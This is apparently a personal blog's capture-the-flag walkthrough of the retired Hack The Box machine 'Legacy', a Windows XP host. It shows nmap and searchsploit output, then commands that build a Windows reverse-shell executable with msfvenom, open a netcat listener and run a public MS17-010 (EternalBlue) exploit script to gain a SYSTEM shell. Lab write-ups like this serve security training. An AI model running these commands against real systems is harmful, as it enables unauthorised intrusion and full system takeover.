Chris Ruggieri (Neocount Phoenix)

Security Blog, Rants, Raves, Write-ups, and Code

Legacy

Imported · Chris Ruggieri

Name: Legacy
Release Date: 15 Mar 2017
Retire Date: 26 May 2017
OS: Windows
Base Points: Easy - Retired [0]
Rated Difficulty:
Radar Graph:
0x1Nj3cT0R 18 days, 19 hours, 04 mins, 44 seconds
0x1Nj3cT0R 18 days, 19 hours, 02 mins, 21 seconds
Creator: ch4p
CherryTree File: CherryTree - Remove the .txt extension
Security Blog, Rants, Raves, Write-ups, and Code

Legacy

Again, we start with nmap -sC -sV -oA ./legacy 10.10.10.4

 
$  nmap -sC -sV -Pn -oA ./legacy 10.10.10.4
  
  Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-07 17:08 EDT
  Nmap scan report for 10.10.10.4
  Host is up (0.060s latency).
  Not shown: 997 filtered ports
  PORT     STATE  SERVICE       VERSION
  139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
  445/tcp  open   microsoft-ds  Windows XP microsoft-ds
  3389/tcp closed ms-wbt-server
  Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

  Host script results:
  |_clock-skew: mean: -4h29m47s, deviation: 2h07m16s, median: -5h59m47s
  |_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:4e:56 (VMware)
  | smb-os-discovery: 
  |   OS: Windows XP (Windows 2000 LAN Manager)
  |   OS CPE: cpe:/o:microsoft:windows_xp::-
  |   Computer name: legacy
  |   NetBIOS computer name: LEGACY\x00
  |   Workgroup: HTB\x00
  |_  System time: 2020-04-07T21:09:14+03:00
  | smb-security-mode: 
  |   account_used: guest
  |   authentication_level: user
  |   challenge_response: supported
  |_  message_signing: disabled (dangerous, but default)
  |_smb2-time: Protocol negotiation failed (SMB2)
 
  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 77.56 seconds
 

SMB and RDP.  This is an older system with XP and SMBv1 (WannaCry anyone?). Let's do a quick searchsploit and see what we come up with.

 
  kali@kali:~/Legacy$ searchsploit smb remote eternal
  ----------------------------------------------------------------------------------------- ----------------------------------------
   Exploit Title                                                                           |  Path
                                                                                           | (/usr/share/exploitdb/)
  ----------------------------------------------------------------------------------------- ----------------------------------------
  Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code  | exploits/windows/remote/43970.rb
  Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)         | exploits/windows/remote/42031.py
  Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Executio | exploits/windows/remote/42315.py
  Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-01 | exploits/windows_x86-64/remote/42030.py
  ----------------------------------------------------------------------------------------- ----------------------------------------
  Shellcodes: No Result
 

If we use https://github.com/helviojunior/MS17-010, in particular the send & receive script, but first we need an executeable reverse shell payload and a netcat listener. Step by step for this is:

  Step 1: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.XX.XX LPORT=9999 -f exe > exploit.exe
  Step 2: nc -lvnp 9999
  Step 3: python send_and_execute.py 10.10.10.4 /home/kali/Legacy/exploit.exe

Make sure Step 3 is inside the MS17-010 git cloned folder.  There's a MYSMB.pyc in there that send & receive calls on.  And BOOM! Fireworks!  We have a shell that (I'm assuming because whoami fails) is NT AUTHORITY\SYSTEM.  We can grab our flags at:


C:\Documents and Settings\john\Desktop\user.txt
C:\Documents and Settings\Administrator\Desktop\root.txt

 

©2020 Phoenix Computing Solutions | Powered by Coffee, Sarcasm, and Insanity
  Everything included in the site is the intellectual property of Chris Ruggieri (Neocount Phoenix) and Phoenix Computing Solutions.
  This information should not be construed as legal advice. The owner can not be held liable for anything another entity does with this information.
  This information is solely the opinions and experiences of myself (Chris Ruggieri) and should not be construed as endorsement of any product, service, or of illegal activity

(GET WRITTEN PERMISSION PEOPLE!!)
  Any links I provide as a convenience and for informational purposes only; they do not constitute an endorsement or an approval by the owner of this site for any of the products, services or opinions of the corporation or organization or individual.
  Contact the external sites for answers to questions regarding its content.
  This Includes any links posted by Chris Ruggieri in any other websites, Social Media networks, Online Groups and Online sharing Websites.